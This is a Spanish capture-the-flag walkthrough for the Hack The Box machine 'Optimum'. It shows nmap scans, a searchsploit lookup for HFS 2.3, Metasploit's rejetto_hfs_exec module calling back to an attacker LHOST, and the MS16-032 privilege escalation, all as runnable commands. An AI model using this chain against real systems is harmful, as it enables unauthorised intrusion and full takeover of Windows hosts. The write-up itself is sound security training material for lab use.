Optimum
✍️ Autor: ch4p 🔍 Dificultad: Fácil 📅 Fecha de creación: 3/10/2017
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 10.10.10.8
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sC -sV 10.10.10.8
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:
Puerto 80 (HTTP): Este puerto generalmente está asociado a servidores web. Si el servicio está ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a través de CVEs). Además, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.
A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 10.10.10.8
para que nos proporcione más información sobre esos puertos específicamente.

Buscamos exploits sobre esa versión.
searchsploit HFS 2.3

🚀 EXPLOTACIÓN
Explotamos a través de Metasploit.
use windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST 10.10.14.7
run
background
Estamos dentro del Usuario Kostas por lo que podemos conseguir la flag del user. Buscamos a través de Metasploit que exploit nos recomienda.
🔐 PRIVILEGIOS
use multi/recon/local_exploit_suggerster
Descubrimos uno que nos llama la atención para explotarlo.
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST 10.10.14.7
set session 1
exploit

getuid

Ya somos root.

Last updated
Was this helpful?